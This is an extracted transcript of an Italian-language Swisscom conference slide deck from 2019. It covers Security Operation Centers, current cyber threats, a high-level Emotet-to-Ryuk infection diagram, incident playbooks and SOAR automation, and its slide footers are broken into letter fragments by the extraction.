security operation center contro le attuali cyber minacce€¦ · malicious macros or scripts...
TRANSCRIPT
![Page 1: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/1.jpg)
Security Operation Center contro le attuali cyber minacce
Swisscom Dialog Arena 2019
![Page 2: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/2.jpg)
Se
curi
ty O
pe
rati
on
Ce
nte
r co
ntr
o le
att
ua
li c
ybe
r m
ina
cce
2
Negli anni 80 l'accesso
si bloccava così…
![Page 3: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/3.jpg)
Web
ina
r C
ybe
r Sw
issc
om
Sec
uri
ty R
epo
rt 2
01
9 C
1 P
ub
lic
3
Incidenti da tutto il mondo …
![Page 4: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/4.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
4
… Ma anche in Ticino
https://www.tio.ch/ticino/cronaca/1393766/taiana-ostaggio-di-cyber-criminali-un-riscatto-da-300mila-franchi
![Page 5: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/5.jpg)
Se
curi
ty O
pe
rati
on
Ce
nte
r co
ntr
o le
att
ua
li c
ybe
r m
ina
cce
La minaccia è realeOgni mese Swisscom…
20Incidenti di sicurezza, Gestiti dal Swisscom CSIRT
2'200Clienti privati contattati a causa di attacchi hacker sugli account dei clienti
3'000Attacchi di phishingriconosciuti e bloccati
3'009'000Tentativi di attacco contro l'infrastruttura di Swisscom bloccati
5
![Page 6: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/6.jpg)
• La situazione della minacce resta complessa e stabile
• Gli attaccanti approfittano del valore crescente degli assets → Attacchi mirati
• La crescita comune del mondo fisico e virtuale propone nuovi vettori d'attacco
6
Radar minacce 2019D
uil
io H
och
stra
sser
, 28
th M
arc
h, S
ecu
rity
Bo
ost
er
Tra
inin
g, C
2 In
tern
al
3D-Printing
Workplace Diversity
Insider ThreatDevice Theft
Drones & Robots Infrastructure Masconfiguration
Decentralised Development
SCADA
IoT DevicesSecurity job marketIoT-Based DDos
Digitalisation
SubscriberCompromisation
AI/Analytics
Political Influence
DigitalIdentity
Destabilising / Centralisation
Automatisation & Scaling
All IPIncreased Complexity
QuantumComputing
Ransomware
Targeted Attacks (APT)
5G SecurityInfrastructureIntegrity
TrendToday
![Page 7: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/7.jpg)
Radar minacce 2019Se
curi
ty O
per
ati
on
Cen
ter
im E
insa
tz g
egen
akt
ue
lle
Cyb
er-B
ed
roh
un
gen
Decentralised Development
Security job market
AI/Analytics
Increased ComplexityTargeted Attacks (APT)
TrendToday
• Security job market: Difficoltà importante per la recluta di talenti
• Targeted Attacks: mirati e complessi → oggettivi specifici
• Ransomware: Cifratura di dati critici → domanda di riscatto per recuperare I dati
• Increased Complexity: LA complessità della architetture aumenta continuamente
• AI/Analytics: Sempre più dati che possono essere utilizzati per influenzare il comportamento di una persona.
• Decentralised Development: Nuovi metodi di sviluppo DevOps
Ransomware
7
![Page 8: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/8.jpg)
8
Panoramica delle minacce cyber
Fattori chiave
Superfice d'attacco
Digitalizzazione
Metodologie degli attacchi
Sofisticazione
Struttura degli attori criminali
Profesionalizzazione
Mercato della criminalità Cyber
Industrializzazione
Du
ilio
Ho
chst
rass
er, 2
8th
Ma
rch
, Sec
uri
ty B
oo
ste
r T
rain
ing
, C2
Inte
rna
l
![Page 9: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/9.jpg)
Se
curi
ty O
pe
rati
on
Ce
nte
r co
ntr
o le
att
ua
li c
ybe
r m
ina
cce
9
>99% delle minacce osservate nel primo semestre 2019 richiedono l'intervento di un utente per riuscire
Proofpoint
![Page 10: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/10.jpg)
Private Clouds
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
10
Security Operation Center in una architettura ibrida
Security Operation
Center
On-Prem
Public Clouds
ManagedEndpoints
BYOD
![Page 11: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/11.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
11
Thank You!
![Page 12: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/12.jpg)
C2 Phase
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
12
Propagazione di un Malware
MALSPAMAttached Documents
Malicious Macros or ScriptsMarco/Script
downloads Emotet
Establish
Persistence
Credential
Enumerator Module
Conntects to C2 for further
instructions.
Download follow up malware
Infection Phase Persistence Phase
NetPass.exeWeb Browser
PassView
Mail Clients
PassViewOutlook Scraper
Module
Network Propagation PhaseSMB
Ryuk
Trickbot
Download additional Malware
![Page 13: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/13.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
13
Detection Use CaseRilevamento di comportamenti anormali generati dai documenti MS-Office
Swisscom Managed Workplaces
Time Range: January 2019 – August 2019
74%
26%
Action
Allowed Blocked
Terminali (Workplace) monitorati
~ 70'000
847
![Page 14: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/14.jpg)
Erst
elle
r, D
atu
m, D
oku
men
ten
na
me,
C2
Inte
rna
l
14
Security
Operation
Center
![Page 15: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/15.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
15
Allerte Analisi Reazione Prevenzione
Dai dati alla reazione
![Page 16: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/16.jpg)
Private Clouds
16
Security Operation Center in una architettura ibrida
Security Operation
Center
On-Prem
Public Clouds
ManagedEndpoints BYOD
Se
curi
ty O
pe
rati
on
Ce
nte
r co
ntr
o le
att
ua
li c
ybe
r m
ina
cce
![Page 17: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/17.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
17
Incident Playbooks
Security Alert
Analyse
Containment
Close
False-Positive?
Ticket CSIRTBlock /
Quarantine
YES
NO
![Page 18: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/18.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
19
SOC, sfide attuali
Aumento costante delle allerte
Manco di personale formato
Infrastrutture differenti
![Page 19: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/19.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
20
Automazione
![Page 20: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/20.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
21
SOAR Technology, panoramicaSecurity Orchestration, Automation and Response
Orchestration
• Playbooks, workflows
• Logically organised plan of actions
• Activate and coordinate security
product stack from central
location
Response
• Case management
• Analysis & reporting
• Communication & collaboration
Automation
• Automated scripts
• Extensible integration network
• Machine execution of playbooks
tasks
![Page 21: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/21.jpg)
• Riduzione dei tempi
• Sollievo per gli analisti
• Miglior qualità dei rilevamenti
• Attività di "Response" più efficienti
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
22
Automatizzazione: Opportunità e rischi
• Workflows complessi
• Lavoro per la manutenzione
• Livello di automazione elevato
Opportunità
Rischi
![Page 22: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/22.jpg)
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
23
Applicare le lezioni apprese
Rilevamento
RispostaPrevenzione
![Page 23: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/23.jpg)
Du
ilio
Ho
chst
rass
er, 2
8th
Ma
rch
, Sec
uri
ty B
oo
ste
r T
rain
ing
, C2
Inte
rna
l
24
Key
Messages
Effettuare i
compiti
di base
Training /
Formazione /
Risorse
Automazione /
Orchestrazione
Anticipazione"Keep an eye on the
threat landscape"
![Page 24: Security Operation Center contro le attuali cyber minacce€¦ · Malicious Macros or Scripts Marco/Script downloads Emotet Establish Persistence Credential Enumerator Module Conntects](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/24.jpg)
Swisscom Cyber Security Report :
https://www.swisscom.ch/it/business/enterprise/downloads/security/report-bedrohungslage-schweiz-2019.html
Documenti interessanti concernete “Cyber Security”
https://www.swisscom.ch/en/business/enterprise/downloads/security.html
Secu
rity
Op
era
tio
n C
ente
r im
Ein
satz
geg
en a
ktu
ell
e C
yber
-Be
dro
hu
ng
en
26
Informazioni diverse